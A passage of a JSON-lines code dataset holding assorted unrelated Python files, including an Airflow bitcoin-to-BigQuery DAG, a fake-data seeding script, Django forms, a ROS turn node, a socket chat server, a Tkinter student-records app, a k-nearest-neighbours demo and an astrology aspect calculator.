\"bitcoin_ds\"\r\nTABLE = \"bitcoin\"\r\nFILE = os.getcwd() + os.sep + \"dags\" + os.sep + \"GCS\" + os.sep + \"bitcoin.sql\" # percorso del file che verrà creato con la query di insert da eseguire\r\n\r\n@dag(dag_id='ab_bq_bitcoin', schedule_interval='@once', start_date=datetime(2021, 1, 1), tags=['iungo', 'gcs'], catchup=False)\r\ndef taskflow():\r\n\r\n def extract_bitcoin_price():\r\n return requests.get(API).json()['bitcoin']\r\n\r\n\r\n def generate_query(ti):\r\n data = ti.xcom_pull(task_ids='extract_bitcoin_price')\r\n\r\n query = f\"INSERT {DATASET}.{TABLE} VALUES (\"\r\n for key in data.keys():\r\n if key == 'last_updated_at':\r\n query += \"'\" + str(datetime.fromtimestamp(data[key]).strftime('%Y-%m-%d %H:%M:%S')) + \"'\"\r\n else:\r\n query += str(data[key]) + \", \"\r\n\r\n query += \");\"\r\n\r\n with open(FILE, 'w') as file:\r\n file.write(query)\r\n file.close()\r\n\r\n\r\n create_empty_dataset = BigQueryCreateEmptyDatasetOperator(\r\n task_id=\"create_empty_dataset\",\r\n dataset_id=DATASET,\r\n gcp_conn_id='google_cloud_default',\r\n exists_ok=True, # If True, ignore “already exists” errors when creating the table.\r\n )\r\n\r\n create_empty_table = BigQueryCreateEmptyTableOperator(\r\n task_id=\"create_empty_table\",\r\n dataset_id=DATASET,\r\n table_id=TABLE,\r\n bigquery_conn_id='google_cloud_default',\r\n schema_fields=[\r\n {'name': 'usd', 'type': 'INTEGER', 'mode': 'REQUIRED'},\r\n {'name': 'usd_market_cap', 'type': 'DECIMAL', 'mode': 'NULLABLE'},\r\n {'name': 'usd_24_vol', 'type': 'DECIMAL', 'mode': 'NULLABLE'},\r\n {'name': 'usd_24_change', 'type': 'DECIMAL', 'mode': 'REQUIRED'},\r\n {'name': 'last_updated_at', 'type': 'TIMESTAMP', 'mode': 'REQUIRED'},\r\n ],\r\n exists_ok=True, # If True, ignore “already exists” errors when creating the table.\r\n )\r\n\r\n extract_bitcoin_price = PythonOperator(\r\n task_id=\"extract_bitcoin_price\",\r\n python_callable=extract_bitcoin_price\r\n ) \r\n\r\n generate_query = PythonOperator(\r\n task_id=\"generate_query\",\r\n python_callable=generate_query\r\n ) \r\n\r\n insert_value = BigQueryInsertJobOperator(\r\n task_id=\"insert_value\",\r\n configuration={\r\n \"query\": {\r\n \"query\": open(FILE, 'r').read(),\r\n \"useLegacySql\": False,\r\n }\r\n },\r\n )\r\n\r\n create_empty_dataset >> create_empty_table >> extract_bitcoin_price >> generate_query >> insert_value\r\n\r\ngraph = taskflow()","repo_name":"Allle98/Airflow","sub_path":"GCS/ab_bq_bitcoin.py","file_name":"ab_bq_bitcoin.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42621606476","text":"from random import choice, randint\n\nfrom sqlalchemy.orm import Session\n\nimport app.crud as crud\nimport app.schemas as schemas\nfrom app.db import SessionLocal\n\nsession = SessionLocal()\n\nname = [\"Luan\", \"Dilermando\", \"Loreta\", \"Graca\", \"Lucas\", \"Gabriel\", \"Vinnie\", \"Carlos\",\n \"Giovani\", \"Laura\", \"Gilda\", \"Bianca\", \"Roberto\", \"Gustavo\", \"Ana\", \"Gabriel\"]\n\nlast_name = [\"Queiroz\", \"Silva\", \"Pereira\", \"Rocha\", \"Santos\", \"Pedra\", \"Pinto\", \"Gonçalves\",\n \"Caetano\", \"Wenzel\", \"Torchia\", \"Monteiro\"]\n\nemail = [\"@gmail.com\", \"@yahoo.com\", \"@hotmail.com\", \"@npc.com\", \"@neko.com\", \"@live.com\"]\n\ndescription = \"Lorem Ipsum is simply dummy text of the printing\" +\\\n \"and typesetting industry. Lorem Ipsum has been the\" +\\\n \"industry's standard dummy text ever since the 1500s,\" +\\\n \"when an unknown printer took a galley of type and\" +\\\n \"scrambled it to make a type specimen book\"\n\ndistrict = [\"tatuape\", \"bela vista\", \"se\", \"moema\", \"paraiso\", \"liberdade\", \"cambuci\", \"mooca\"]\n\ndef cpf_generate():\n while True:\n cpf = [randint(0, 9) for _ in range(9)]\n if cpf != cpf[::-1]:\n break\n\n for i in range(9, 11):\n value = sum((cpf[num] * ((i + 1) - num) for num in range(0, i)))\n digit = ((value * 10) % 11) % 10\n cpf.append(digit)\n\n result = ''.join(map(str, cpf))\n return result\n\n\"\"\"Populate studio\n\"\"\"\ndef populate_studio(amount: int = 10, db: Session = session):\n for i in range(amount):\n studio = {\n \"name\": f\"studio{i}\",\n \"display_name\": f\"{choice(name)} studio\",\n \"country\": \"BRL\",\n \"state\": \"SP\",\n \"city\": \"SP\",\n \"district\": choice(district),\n \"address\": \"rua ficticia\",\n \"number\": randint(1, 1000),\n \"zip_code\": f\"{randint(100000, 999999)}\",\n \"complement\": f\"ap {randint(1, 100)}\",\n \"email\": f\"clientuser{i}{choice(email)}\",\n \"phone_number\": f\"{randint(100000000, 999999999)}\",\n \"description\": description[:randint(1, len(description)-10)],\n \"email_owner\": f\"studio{i}{choice(email)}\"\n }\n\n studio = schemas.StudioCreate(**studio)\n crud.studio.create(db=db, obj_in=studio)\n\n\"\"\"Populate service providers\n\"\"\"\ndef populate_service(amount: int = 10, db: Session = session):\n for i in range(amount):\n service_provider = {\n \"name\": f\"provider{i}\",\n \"display_name\": f\"{choice(name)} {choice(last_name)}\",\n \"cpf\": cpf_generate(),\n \"birth_date\": f\"{randint(1960, 2004)}-{randint(1,12)}-{randint(1,27)}\",\n \"email\": f\"provider{i}{choice(email)}\",\n \"phone_number\": f\"{randint(100000000, 999999999)}\",\n \"description\": description[:randint(1, len(description)-1)]\n }\n\n service_provider = schemas.ServiceProviderCreate(**service_provider)\n crud.provider.create(db=db, obj_in=service_provider)\n\n\"\"\"Populate Client providers\n\"\"\"\ndef populate_client(amount: int = 10, db: Session = session):\n for i in range(amount):\n client = {\n \"name\": f\"client{i}\",\n \"display_name\": f\"{choice(name)} {choice(last_name)}\",\n \"birth_date\": f\"{randint(1960, 2004)}-{randint(1,12)}-{randint(1,27)}\",\n \"cpf\": cpf_generate(),\n \"country\": \"BRL\",\n \"state\": \"SP\",\n \"city\": \"SP\",\n \"district\": choice(district),\n \"address\": \"rua corinthians\",\n \"number\": randint(1, 1000),\n \"zip_code\": f\"{randint(100000, 999999)}\",\n \"complement\": f\"ap {randint(1, 100)}\",\n \"email\": f\"client{i}{choice(email)}\",\n \"phone_number\": f\"{randint(100000000, 999999999)}\"\n }\n \n client = schemas.ClientCreate(**client)\n crud.client.create(db=db, obj_in=client)\n\n\"\"\"Populate sell\n\"\"\"\ndef populate_sell(amount: int = 10, db: Session = session):\n for i in range(amount):\n sell = {\n \"studio_name\": f\"studio{i}\",\n \"client_name\": f\"client{i}\",\n \"service_provider_name\": f\"provider{i}\",\n \"service_style_name\": None,\n \"tender_id\": None,\n \"price\": randint(0, 1000),\n \"studio_rate\": randint(0, 5),\n \"client_rate\": randint(0, 5),\n \"service_provider_rate\": randint(0, 5),\n \"client_suggestion_desc\": description[:randint(1, 140)],\n \"client_satisfied\": True,\n \"number_of_sessions\": randint(1, 4),\n \"client_contract_confirmed\": True,\n \"service_provider_contract_confirmed\": True,\n \"start_time\": \"2022-08-18T01:15:46.185Z\",\n \"last_update\": \"2022-08-18T01:15:46.185Z\",\n \"finish_time\": \"2022-08-18T01:15:46.185Z\"\n }\n \n sell = schemas.SellCreate(**sell)\n crud.sell.create(db=db, obj_in=sell)\n\ndef main():\n populate_studio(10)\n populate_service(10)\n populate_client(10)\n populate_sell(10)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DilermandoQueiroz/service_studio-backend","sub_path":"app/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"11894228751","text":"from django.forms import ModelForm, fields,DateInput\nfrom django.forms.models import ModelChoiceField\nfrom .models import MyUser,Hotel, Room,Booking\n# from django.forms import CharField, Form, PasswordInput\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django import forms\n\nclass MyUserForm(UserCreationForm):\n \n class Meta:\n model=MyUser\n fields=['email','username','fullname','phone','address','image']\n \n\nclass HotelForm(ModelForm):\n class Meta:\n model=Hotel\n fields = \"__all__\"\n\nclass RoomForm(ModelForm):\n class Meta:\n model=Room\n exclude =['active_booking','total_booking','status','hotel'] \n \nclass HotelForm(ModelForm):\n class Meta:\n model=Hotel\n exclude=['status','owner'] \n\nclass EditUserForm(ModelForm):\n class Meta:\n model=MyUser\n fields=['email','username','fullname','phone','address','image']\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\nclass BookingForm(ModelForm):\n \n class Meta:\n model=Booking\n fields=['date_from','date_to','number_of_adult','number_of_child']\n widgets = {\n 'date_from': DateInput(),\n 'date_to': DateInput(),\n }\n","repo_name":"Mubarisk/Hotel-Management","sub_path":"customers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4373394786","text":"from django.db.models.signals import post_save, post_delete\n# from django.contrib.auth import get_user_model\nfrom django.dispatch import receiver\nfrom taggit.models import Tag\nfrom .models import PostTag, PostTagExtended\n\n# print('signals imported')\n# User = get_user_model()\n\n# A new tag is saved, create extended part\n@receiver(post_save, sender = Tag)\ndef create_extended_tag(sender, instance, created, **kwargs):\n\tif created:\n\t\t# print('profile is being created')\n\t\tPostTagExtended.objects.create(tag = instance)\n\n\n# new extended part is created save it.\n# @receiver(post_save, sender = Tag)\n# def save_extended_tag(sender, instance, created, **kwargs):\n# \t# print('profile is saved')\n# \tinstance.PostTagExtended.save()\n\n@receiver(post_save, sender = PostTag)\ndef tag_count_increment(sender, instance, created, **kwargs):\n\tinstance.tag.posttagextended.count += 1\n\tinstance.tag.posttagextended.save()\n\n@receiver(post_delete, sender = PostTag)\ndef tag_count_decrement(sender, instance, **kwargs):\n\tif instance.tag.posttagextended.count > 0:\n\t\tinstance.tag.posttagextended.count -= 1\n\t\tinstance.tag.posttagextended.save()\n","repo_name":"naeem-akhtar/paperhub","sub_path":"posts/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33677238033","text":"#!/usr/bin/env python2\n\n\"\"\"Turns the neato a certain amount.\"\"\"\n\nfrom geometry_msgs.msg import Twist, Vector3\nfrom nav_msgs.msg import Odometry\nimport numpy as np\nimport tf\nimport math\n\nimport smach\nimport rospy\n\nclass Turn(smach.State):\n def __init__(self, goal_angle):\n super(Turn, self).__init__(outcomes=['Completed_Successfully', 'Aborted'])\n self.goal_angle = goal_angle\n self.orientation = None\n\n self.got_first_odom_msg = False\n\n rospy.Subscriber('/odom', Odometry, self.update_odometry)\n self.publisher = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n\n rospy.on_shutdown(self.stop)\n\n\n def convert_to_euler(self, x, y, z, w):\n quaternion = (x, y, z, w)\n euler = tf.transformations.euler_from_quaternion(quaternion)\n roll = euler[0]\n pitch = euler[1]\n yaw = euler[2]\n return np.array([roll, pitch, yaw])\n\n def stop(self):\n self.publisher.publish(\n Twist(linear=Vector3(0.0, 0.0, 0.0), angular=Vector3(0.0, 0.0, 0.0))\n )\n\n def update_odometry(self, msg):\n current_quat = msg.pose.pose.orientation\n self.orientation = self.convert_to_euler(current_quat.x, current_quat.y, current_quat.z, current_quat.w)\n\n if not self.got_first_odom_msg:\n self.got_first_odom_msg = True\n \n def get_angle(self):\n return -self.orientation[2]\n\n def delta_angle(self, a, b):\n return ((b - a) + math.pi) % (math.pi * 2.0) - math.pi\n\n def rotate(self, angle):\n r = rospy.Rate(50)\n\n starting_angle = self.get_angle()\n final_angle = starting_angle + angle\n\n while not rospy.is_shutdown() and self.got_first_odom_msg:\n delta = self.delta_angle(self.get_angle(), final_angle)\n if abs(delta) >= math.pi / 500.0:\n turn_msg = Twist(angular=Vector3(0.0, 0.0, -delta * 0.9))\n self.publisher.publish(turn_msg)\n else:\n self.stop()\n return True\n r.sleep()\n if rospy.is_shutdown():\n return False\n\n def execute(self, userdata):\n return self.run()\n\n def run(self):\n r = rospy.Rate(50)\n\n # Wait for the first odometry position update to come in\n while not self.got_first_odom_msg:\n r.sleep()\n\n success = self.rotate(self.goal_angle)\n if success:\n return 'Completed_Successfully'\n else:\n return 'Aborted'\n\nif __name__ == '__main__':\n rospy.init_node('Turn')\n Turn(-math.pi/2).run()\n","repo_name":"Joboman555/Drawbot","sub_path":"src/drawbot/Turn.py","file_name":"Turn.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20516784341","text":"import socket\r\nimport _thread\r\nfrom _thread import start_new_thread\r\n\r\n# parameters\r\nhost_ip=''\r\nport_no=8082\r\nclient_list = []\r\n\r\ndef bind(host_ip,port_no):\r\n\ts=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\ts.bind((host_ip,port_no))\r\n\ts.listen(5)\r\n\treturn s\r\n\r\n\r\ndef client_broadcast(addr,strg):\r\n\tfor i in client_list:\r\n\t\ta=str(addr)+str(strg)\r\n\t\ti.sendall(str.encode(a))\r\n\r\ndef client_thread(c,addr):\r\n\t\tprint (\"got connection from\", addr)\r\n\t\ti=\"\"\r\n\t\twhile i != \"exit\":\r\n\t\t\ti=c.recv(1024).decode()\r\n\t\t\tprint (\"received\", addr, i)\r\n\t\t\tstart_new_thread(client_broadcast, (addr,i, ))\t\t\r\n\t\tprint (\"client connection closed\", addr)\r\n\t\tc.close()\r\n\t\tclient_list.pop(client_list.index(c))\r\n\r\ndef connect_clients(s):\r\n\twhile True:\r\n\t\tc,addr=s.accept()\r\n\t\tclient_list.append(c)\r\n\t\tstart_new_thread(client_thread, (c,addr,))\r\n\r\ndef main():\r\n\ts=bind(host_ip, port_no)\r\n\tconnect_clients(s)\r\n\tprint (\"connection closed with all the clients\\n\")\r\n\ts.close()\r\n\r\nif __name__== \"__main__\":\r\n\tmain()\r\n","repo_name":"koushikskr/NA1-PART1","sub_path":"napart2/krshny-Part2-d-server-krshny.py","file_name":"krshny-Part2-d-server-krshny.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9283774591","text":"import json\n\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom devmine.app.models.github.user import GithubUser\nfrom devmine.app.controllers.application_controller import (\n ApplicationController\n)\nfrom devmine.app.helpers import application_helper as ah\n\n\nclass GithubUsersController(ApplicationController):\n\n def index(self, db):\n \"\"\"Return the list of all users.\"\"\"\n since_id = super().get_since_id()\n try:\n users = db.query(GithubUser).filter(\n GithubUser.id >= since_id).limit(100).all()\n except NoResultFound:\n users = {}\n return json.dumps(users, cls=ah.AlchemyEncoder)\n\n def show(self, db, id):\n \"\"\"Return the user corresponding to the given id.\"\"\"\n super().assert_id(id)\n try:\n user = db.query(GithubUser).filter_by(id=id).one()\n except NoResultFound:\n user = {}\n return json.dumps(user, cls=ah.AlchemyEncoder)\n\n def login(self, db, login):\n \"\"\"Return the user corresponding to the given login.\"\"\"\n try:\n login = db.query(GithubUser).filter_by(login=login).all()\n except NoResultFound:\n login = {}\n return json.dumps(login, cls=ah.AlchemyEncoder)\n","repo_name":"DevMine/devmine-core","sub_path":"devmine/app/controllers/github/users_controller.py","file_name":"users_controller.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"6133709418","text":"# Import module\nfrom tkinter import *\nfrom tkinter import ttk \nimport Common_Requirements_File\nfrom PIL import ImageTk,Image\nfrom tkinter import messagebox\nfrom connection import *\nimport pymysql\n\nclass update_Student:\n def __init__(self,update_student_root):\n self.update_student_root = update_student_root\n self.update_student_root.title(\"Update Student\")\n self.regno_var = StringVar()\n\n # self.update_student_frame()\n self.regno()\n\n p_obj=Common_Requirements_File.Common_Requirements(self.update_student_root)\n p_obj.header()\n p_obj.left_nav_bar_setting()\n p_obj.right_nav_bar_setting()\n\n # Search box\n def regno(self):\n self.frm = Frame(self.update_student_root,bg='white')\n self.frm.place(x=550,y=100,height=100,width=400)\n\n regno=Label(self.frm,text=\"Enter Registration Number : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=10,y=15)\n self.txt_frame=Entry(self.frm,font=(\"time new roman\",15),bg=\"lightgrey\",textvariable=self.regno_var).place(x=10,y=50,width=330)\n s_btn=Button(self.frm,bd=0,cursor=\"hand2\" ,text=\"🔍\",fg=\"green\",bg=\"white\",font=(15),activebackground=\"white\",activeforeground=\"white\",command=self.check_regno).place(x=350,y=50,width=30,height=25)\n\n # Checking search box value\n def check_regno(self):\n if self.regno_var.get()==\"\":\n messagebox.showerror(\"Error\",\"Please Enter The Fields To Proceed\")\n else:\n try:\n cur=connection()\n cur.execute(\"Select * from student_details where registration_number=%s\",(self.regno_var.get()))\n self.rows = cur.fetchall()\n if len(self.rows) == 0:\n self.not_found()\n messagebox.showerror(\"Error\",\"Sorry, We cannot find a student with this registration\")\n else:\n self.found_data(self.rows)\n self.update_studet_frame(self.rows)\n \n except Exception as es :\n messagebox.showerror(\"Error\",f\"Error due to: {str(es)}\")\n\n # Display searched details in frame\n def found_data(self,rows):\n self.found_frm = Frame(self.update_student_root,bg='white')\n self.found_frm.place(x=300,y=250,height=400,width=435)\n\n Label(self.found_frm,text=f\"Student Details of {rows[0][0]}\",font=(\"Candara Light\",25,\"bold\",\"underline\"),fg=\"black\",bg='white').pack(side=TOP)\n \n Label(self.found_frm,text=\"Reg No. : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=95)\n Label(self.found_frm,text=f\"{rows[0][0]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=95)\n\n Label(self.found_frm,text=\"Name : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=135)\n Label(self.found_frm,text=f\"{rows[0][1]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=135)\n\n Label(self.found_frm,text=\"Department : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=175)\n Label(self.found_frm,text=f\"{rows[0][2]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=175)\n\n Label(self.found_frm,text=\"Year : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=215)\n Label(self.found_frm,text=f\"{rows[0][3]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=215)\n\n Label(self.found_frm,text=\"Date of Birth : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=255)\n Label(self.found_frm,text=f\"{rows[0][4]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=255)\n\n Label(self.found_frm,text=\"Number : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=295)\n Label(self.found_frm,text=f\"{rows[0][5]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=295)\n \n Label(self.found_frm,text=\"Email : \",font=(\"times new roman\",15),bg=\"white\", fg=\"black\").place(x=20,y=335)\n Label(self.found_frm,text=f\"{rows[0][6]}\",font=(\"times new roman\",14),bg=\"white\", fg=\"black\").place(x=140,y=335)\n\n def update_studet_frame(self,rows):\n frm_update = Frame(self.update_student_root,bg='white')\n frm_update.place(x=775,y=250,height=400,width=425)\n\n title1=Label(frm_update,text=\"Update student\",font=(\"Candara Light\",25,\"bold\",\"underline\"),fg=\"black\",bg=\"white\").pack(side=TOP)\n \n data_update_values=['Select','Name','department','year','dob','contact','email']\n\n lal_select_detatils=Label(frm_update,text=\"Select Details To Change\",font=(\"Goudy old style\",15,\"bold\"),bg=\"white\").place(x=25,y=80)\n self.select_detatils = ttk.Combobox(frm_update, value=data_update_values,font=\"calibri 12\",state='readonly') \n self.select_detatils .place(x=25,y=120,width=375,height=25)\n self.select_detatils .current(0)\n\n self.mystr = StringVar()\n\n lal_old_data=Label(frm_update,text=\"Previous Data\",font=(\"Goudy old style\",15,\"bold\"),bg=\"white\").place(x=25,y=165)\n self.old_data = Entry(frm_update,font=(\"calibri\",12, \"bold\"),fg=\"black\",borderwidth=2,textvariable=self.mystr, state=DISABLED) \n self.old_data.place(x=25,y=200,width=375,height=25)\n self.select_detatils.bind(\"<>\", self.previous_details)\n\n\n lal_new_data=Label(frm_update,text=\"New Data\",font=(\"Goudy old style\",15,\"bold\"),bg=\"white\").place(x=25,y=240)\n self.new_data = Entry(frm_update,font=(\"calibri\",12),borderwidth=2) \n self.new_data.place(x=25,y=280,width=375,height=25)\n \n s_btn=Button(frm_update,bd=0,cursor=\"hand2\",text=\"Update\",fg=\"white\",bg=\"dimgray\",font=(\"times new roman\",20,\"bold\"),activebackground=\"gray\",activeforeground=\"white\",command=self.update_details).place(x=25,y=330,width=375,height=40)\n\n def previous_details(self,event):\n if self.select_detatils.get() != \"Select\":\n cur=connection()\n cur.execute(\"select \"+self.select_detatils.get()+\" from student_details where registration_number= %s \",(self.rows[0][0]))\n row=cur.fetchone()\n previoust_data=row[0]\n self.mystr.set(previoust_data)\n else: \n self.mystr.set(\"\")\n\n def update_details(self):\n if self.select_detatils.get()==\"Select\" or self.new_data.get()==\"\":\n messagebox.showerror(\"Error\",\"All feilds are required\")\n elif self.old_data.get() == self.new_data.get():\n messagebox.showerror(\"Error\",\"You are trying to update the same details\")\n else:\n msg = messagebox.askquestion(\"Question\",\"Do you surely need to update\")\n if msg == 'yes':\n con= givi_me_connection()\n cur = con.cursor()\n cur.execute(\"update student_details set \"+self.select_detatils.get()+\" =%s where registration_number= %s\",(self.new_data.get(),self.regno_var.get()))\n con.commit()\n messagebox.showinfo(\"Updated\",\"Details Updated\")\n cur.execute(\"Select * from student_details where registration_number=%s\",(self.regno_var.get()))\n rows = cur.fetchall()\n self.found_data(rows)\n self.update_studet_frame(self.rows)\n\n def not_found(self):\n self.not_frm = Frame(self.update_student_root,bg='#f0f0f0')\n self.not_frm.place(x=300,y=250,height=400,width=1200)\n\ndef update_student_main():\n update_student_root=Tk()\n obj = update_Student(update_student_root)\n update_student_root.mainloop() ","repo_name":"magarwal1324/Debug-Entity","sub_path":"Smart Attendance All Done/update_student.py","file_name":"update_student.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30462340958","text":"import numpy as np\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nimport warnings\nfrom matplotlib import style\nfrom collections import Counter #will act as counter for k\nstyle.use('fivethirtyeight')\n\ndataset={'k':[[1,2],[2,3],[3,1]],'r':[[6,5],[7,7],[8,6]]} #dictionary containg two classes k,r\nnew_features=[5,7]\n\n'''\n[[plt.scatter(ii[0],ii[1],s=100,color=i) for ii in dataset[i]] for i in dataset] #plotting each element of each class\nplt.scatter(new_features[0],new_features[1])\nplt.show()\n'''\n\ndef k_nearest_neighbors(data,predict,k=3):\n if(len(data)>=k):\n warnings.warn('K is set to a value less than total voting groups')\n distances=[]\n for group in data:\n for features in data[group]:\n euclidean_distance=np.linalg.norm(np.array(features)-np.array(predict))#it is actually the built in function from numpy which allow us,#to calculate euclidean_distance for n dimension features(#cheating)\n distances.append([euclidean_distance,group]) #distances is a list of lists [[a,b]..] a is distance from each element of group k and r, b is 1 or 2\n print(distances) #-> [[6.4031242374328485, 'k'], [5.0, 'k'], [6.324555320336759, 'k'], [2.23606797749979, 'r'], [2.0, 'r'], [3.1622776601683795, 'r']]\n votes=[i[1] for i in sorted(distances)[:k]] # distances sorted by their forst value i.e the distances and we only need first k values from starting\n print(votes) # -> ['r', 'r', 'r']\n print(Counter(votes).most_common(1)) #->[('r', 3)], now most_common(1) means select only one which is the most common ie r (which is 3 times) here\n #in case we hade most_common(2) then our output will be have two list elements(like take new_features=5,4 and result would be [('k', 2), ('r', 1)]\n vote_result=Counter(votes).most_common(1)[0][0] #now two zeroes meaning is clear\n return vote_result\n\n\nresult=k_nearest_neighbors(dataset,new_features,k=3)\nprint(result)\n\n\n[[plt.scatter(ii[0],ii[1],s=100,color=i) for ii in dataset[i]] for i in dataset] #plotting each element of each class\nplt.scatter(new_features[0],new_features[1], color=result)\nplt.show()\n","repo_name":"vsrandom/Machine_Learning","sub_path":"Knearestneigh/my_k_near_neigh (copy).py","file_name":"my_k_near_neigh (copy).py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9918108870","text":"\"\"\"A program to count the number of pairs of repeated characters in a string.\r\nSimlindile Mahlaba\r\n09 May 2014\"\"\"\r\n\r\ndef rep_letters(str_1, list_1, count):\r\n if len(str_1)>0:\r\n if len(list_1)==0:\r\n list_1.append(str_1[0])\r\n elif str_1[0]!=list_1[len(list_1)-1]:\r\n list_1.append(str_1[0])\r\n else:\r\n if str_1[0]==list_1[len(list_1)-1]:\r\n list_1.remove(str_1[0])\r\n count+=1\r\n str_1=str_1[1:len(str_1)]\r\n return rep_letters(str_1, list_1, count)\r\n if len(str_1)==0:\r\n return count\r\n\r\ndef main():\r\n str_1=input(\"Enter a message:\\n\")\r\n list_1=[]\r\n count=0\r\n print(\"Number of pairs:\",rep_letters(str_1, list_1, count))\r\nmain()\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/mhlsim020/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74716742199","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 16 22:38:11 2019\n\n@author: viren\n\"\"\"\n\nfrom pandas_datareader import data\nimport datetime\nfrom bokeh.plotting import figure, show, output_file\n\nstart=datetime.datetime(2016,3,2);\nend=datetime.datetime(2016,5,10);\ndf=data.DataReader(name=\"GOOG\",data_source=\"yahoo\",start=start,end=end);\n\ndef inc_dec(c,o):\n if c>o:\n value=\"Increase\";\n elif c 180:\r\n\t\t\taspect = 360 - aspect\r\n\r\n\t# return aspect\r\n\treturn round(aspect,2)\r\n\r\ndef parse_ephemeris (data):\r\n\t\"\"\"\r\n\tdata is taken from the ephermeris here: http://ephemeris.com/ephemeris.php\r\n\tparse each line of the data and load it into the 'input' dataframe\r\n\r\n\tARGS:\r\n\t- input = a panda DataFrame of ephemeris data for a given day\r\n\t- datafil - raw planetary data includes sign, degrees, minutes (see below)\r\n\r\n\tRETURN:\r\n\t- DataFrame representing the 'matrix' of all planetary aspects possible\r\n\t for the given input.\r\n\t\r\n\tFor example, if the input contains the planetary data for Mars, Jupiter, Saturn,\r\n\tthe returned data will be a 3x3 matrix of the planetary aspects:\r\n\t\t- Mars-Mars (set to None)\r\n\t\t- Mars-Jupiter (aspect angle between the two planetary bodies)\r\n\t\t- Mars-Saturn (aspect angle between the two planetary bodies)\r\n\t\"\"\"\r\n\tdatafile = open(data, 'r')\r\n\tLines = datafile.readlines()\r\n\r\n\t# parse and store [the first 24 char of] each line into planetary positions\r\n\tinput = pd.DataFrame()\r\n\tfor line in Lines:\r\n\t\tif len(line[:24].split()) == 4:\r\n\t\t\tbody, degrees, sign, minutes = line[:24].split()\r\n\r\n\t\t\t# Pandas expects that each value of a dictionary to be a list\r\n\t\t\tdata = dict(body=body, sign=sign, degrees=degrees, minutes=minutes)\r\n\t\t\tnew_row = pd.DataFrame([data])\r\n\r\n\t\t# handle Moon's Node - len = 5\r\n\t\telse:\r\n\t\t\tbody, _, degrees, sign, minutes = line[:24].split()\r\n\r\n\t\t\t# convert each row from List to Dict, then a DataFrame\r\n\t\t\tdata = dict(body=\"MoonsNode\", sign=sign, degrees=degrees, minutes=minutes)\r\n\r\n\t\t\t# error - need to force an index\r\n\t\t\t# see https://stackoverflow.com/questions/57631895/dictionary-to-dataframe-error-if-using-all-scalar-values-you-must-pass-an-ind\r\n\t\t\tnew_row = pd.DataFrame([data])\r\n\r\n\t\t# collect all rows\r\n\t\tinput = pd.concat([input, new_row], ignore_index=True)\r\n\r\n\t# get list of 'keys' or planetary bodies from the input\r\n\tinput.set_index('body', inplace=True)\r\n\tmatrix = pd.DataFrame()\r\n\r\n\t# for each body fetch the aspect between it and the remaining bodies (targets)\r\n\tbodies = list(input.index.values)\r\n\tfor body in bodies:\r\n\t\ttargets = copy.deepcopy(bodies)\r\n\t\t# targets.remove(body)\r\n\t\trow = {'body': body}\r\n\r\n\t\tsource_pos = list(input.loc[body][[\"sign\", \"degrees\", \"minutes\"]])\r\n\t\tfor target in targets:\r\n\t\t\ttarget_pos = list(input.loc[target][[\"sign\", \"degrees\", \"minutes\"]])\r\n\r\n\t\t\t# give unique name to each aspect\r\n\t\t\t# label = body.lower() + '_' + target.lower()\r\n\t\t\taspect = calc_aspect(source_pos, target_pos)\r\n\r\n\t\t\tif body != target:\r\n\t\t\t\trow[target] = aspect\r\n\t\t\telse:\r\n\t\t\t\trow[target] = \"NULL\"\r\n\r\n\t\t# Pandas expects that each value of a dictionary to be a list\r\n\t\t# Convert dictionary to a dictionary of lists\r\n\t\tdict_data = {k: [v] for k, v in row.items()}\r\n\r\n\t\tnew_row = pd.DataFrame(dict_data)\r\n\r\n\t\t# collect all rows\r\n\t\tmatrix = pd.concat([matrix, new_row], 